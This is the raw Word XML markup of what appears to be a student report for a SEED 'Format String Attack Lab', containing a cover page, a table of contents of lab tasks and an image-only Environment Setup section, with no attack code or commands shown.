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bookmarkStart w:id="0" w:name="_GoBack" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="0" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-364443183"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E"/>
        <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="182880" distR="182880" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                    <wp:simplePos x="0" y="0"/>
                    <mc:AlternateContent>
                      <mc:Choice Requires="wp14">
                        <wp:positionH relativeFrom="margin">
                          <wp14:pctPosHOffset>7700</wp14:pctPosHOffset>
                        </wp:positionH>
                      </mc:Choice>
                      <mc:Fallback>
                        <wp:positionH relativeFrom="page">
                          <wp:posOffset>1355725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54000</wp14:pctPosVOffset>
                        </wp:positionV>
                      </mc:Choice>
                      <mc:Fallback>
                        <wp:positionV relativeFrom="page">
                          <wp:posOffset>5773420</wp:posOffset>
                        </wp:positionV>
                      </mc:Fallback>
                    </mc:AlternateContent>
                    <wp:extent cx="4686300" cy="6720840"/>
                    <wp:effectExtent l="0" t="0" r="10160" b="3810"/>
                    <wp:wrapSquare wrapText="bothSides"/>
                    <wp:docPr id="131" name="Text Box 13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4686300" cy="672084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C4310E" w:rsidRDefault="00FA722A">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:spacing w:before="40" w:after="560" w:line="216" w:lineRule="auto"/>
                                  <w:rPr>
                                    <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                    <w:sz w:val="72"/>
                                    <w:szCs w:val="72"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>
                                      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                      <w:sz w:val="72"/>
                                      <w:szCs w:val="72"/>
                                    </w:rPr>
                                    <w:alias w:val="Title"/>
                                    <w:tag w:val=""/>
                                    <w:id w:val="151731938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C4310E" w:rsidRPr="00C4310E">
                                      <w:rPr>
                                        <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                      <w:t>Format String Attack Lab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caps/>
                                    <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:alias w:val="Subtitle"/>
                                  <w:tag w:val=""/>
                                  <w:id w:val="-2090151685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:rsidR="00C4310E" w:rsidRDefault="00C4310E">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:spacing w:before="40" w:after="40"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80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1F3864" w:themeColor="accent5" w:themeShade="80"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>SEED 2.0</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:sdt>
                                <w:sdtPr>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="4472C4" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:alias w:val="Author"/>
                                  <w:tag w:val=""/>
                                  <w:id w:val="-1536112409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:rsidR="00C4310E" w:rsidRDefault="00C4310E">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:spacing w:before="80" w:after="40"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent5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4472C4" w:themeColor="accent5"/>
                                        <w:sz w:val="24"/>
                                        <w:szCs w:val="24"/>
                                      </w:rPr>
                                      <w:t>Enter your name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79000</wp14:pctWidth>
                    </wp14:sizeRelH>
                    <wp14:sizeRelV relativeFrom="page">
                      <wp14:pctHeight>35000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31" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:369pt;height:529.2pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:790;mso-height-percent:350;mso-left-percent:77;mso-top-percent:540;mso-wrap-distance-left:14.4pt;mso-wrap-distance-top:0;mso-wrap-distance-right:14.4pt;mso-wrap-distance-bottom:0;mso-position-horizontal-relative:margin;mso-position-vertical-relative:page;mso-width-percent:790;mso-height-percent:350;mso-left-percent:77;mso-top-percent:54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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                      <w:txbxContent>
                        <w:p w:rsidR="00C4310E" w:rsidRDefault="006B292B">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:spacing w:before="40" w:after="560" w:line="216" w:lineRule="auto"/>
                            <w:rPr>
                              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                              <w:sz w:val="72"/>
                              <w:szCs w:val="72"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                              <w:alias w:val="Title"/>
                              <w:tag w:val=""/>
                              <w:id w:val="151731938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EndPr/>
                            <w:sdtContent>
                              <w:r w:rsidR="00C4310E" w:rsidRPr="00C4310E">
                                <w:rPr>
                                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>Format String Attack Lab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caps/>
                              <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:alias w:val="Subtitle"/>
                            <w:tag w:val=""/>
                            <w:id w:val="-2090151685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EndPr/>
                          <w:sdtContent>
                            <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:spacing w:before="40" w:after="40"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80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aps/>
                                  <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>SEED 2.0</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="4472C4" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:alias w:val="Author"/>
                            <w:tag w:val=""/>
                            <w:id w:val="-1536112409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EndPr/>
                          <w:sdtContent>
                            <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:spacing w:before="80" w:after="40"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent5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aps/>
                                  <w:color w:val="4472C4" w:themeColor="accent5"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                                <w:t>Enter your name</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="margin" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB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245745</wp:posOffset>
                        </wp:positionV>
                      </mc:Fallback>
                    </mc:AlternateContent>
                    <wp:extent cx="594360" cy="987552"/>
                    <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                    <wp:wrapNone/>
                    <wp:docPr id="132" name="Rectangle 132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spect="1"/>
                          </wps:cNvSpPr>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="594360" cy="987552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FFFFFF" w:themeColor="background1"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:alias w:val="Year"/>
                                  <w:tag w:val=""/>
                                  <w:id w:val="-785116381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23-01-01T00:00:00Z">
                                    <w:dateFormat w:val="yyyy"/>
                                    <w:lid w:val="en-US"/>
                                    <w:storeMappedDataAs w:val="dateTime"/>
                                    <w:calendar w:val="gregorian"/>
                                  </w:date>
                                </w:sdtPr>
                                <w:sdtEndPr/>
                                <w:sdtContent>
                                  <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:jc w:val="right"/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  <w:t>2023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45720" tIns="45720" rIns="4572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7600</wp14:pctWidth>
                    </wp14:sizeRelH>
                    <wp14:sizeRelV relativeFrom="page">
                      <wp14:pctHeight>9800</wp14:pctHeight>
                    </wp14:sizeRelV>
                  </wp:anchor>
                </w:drawing>
              </mc:Choice>
              <mc:Fallback>
                <w:pict>
                  <v:rect id="Rectangle 132" o:spid="_x0000_s1027" style="position:absolute;margin-left:-4.4pt;margin-top:0;width:46.8pt;height:77.75pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:76;mso-height-percent:98;mso-top-percent:23;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical-relative:page;mso-width-percent:76;mso-height-percent:98;mso-top-percent:23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" fillcolor="#5b9bd5 [3204]" stroked="f" strokeweight="1pt">
                    <v:path arrowok="t"/>
                    <o:lock v:ext="edit" aspectratio="t"/>
                    <v:textbox inset="3.6pt,,3.6pt">
                      <w:txbxContent>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:alias w:val="Year"/>
                            <w:tag w:val=""/>
                            <w:id w:val="-785116381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23-01-01T00:00:00Z">
                              <w:dateFormat w:val="yyyy"/>
                              <w:lid w:val="en-US"/>
                              <w:storeMappedDataAs w:val="dateTime"/>
                              <w:calendar w:val="gregorian"/>
                            </w:date>
                          </w:sdtPr>
                          <w:sdtEndPr/>
                          <w:sdtContent>
                            <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:jc w:val="right"/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  <w:t>2023</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="margin" anchory="page"/>
                  </v:rect>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w: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en-GB"/>
        </w:rPr>
        <w:id w:val="-867527294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:rsidR="00C4310E" w:rsidRDefault="00C4310E">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00C4310E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016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32474983" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Environment Setup</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474983 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA722A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc132474984" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474984 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc132474985" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474985 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A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32474986" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2A</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474986 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A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32474987" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2B</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474987 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc132474988" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474988 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A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32474989" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3A</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474989 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A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32474990" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3B</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474990 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A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32474991" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3C</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474991 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc132474992" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 4</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474992 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc132474993" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 5</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474993 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006B292B" w:rsidRDefault="00FA722A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc132474994" w:history="1">
            <w:r w:rsidR="006B292B" w:rsidRPr="00955F20">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 6</w:t>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc132474994 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006B292B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 w:rsidR="006B292B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00C4310E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367B30" w:rsidRDefault="00C4310E" w:rsidP="00C4310E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc132474983"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Environment Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00C4310E" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F1E26C3" wp14:editId="140A70E6">
            <wp:extent cx="5731510" cy="506730"/>
            <wp:effectExtent l="0" t="0" r="254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7F33" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E865D95" wp14:editId="1522254A">
            <wp:extent cx="5731510" cy="244665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7F33" w:rsidRDefault="00997F33" w:rsidP="00C4310E">
      <w:r w:rsidRPr="00997F33">
        <w:rPr>
          <w:noProof/>
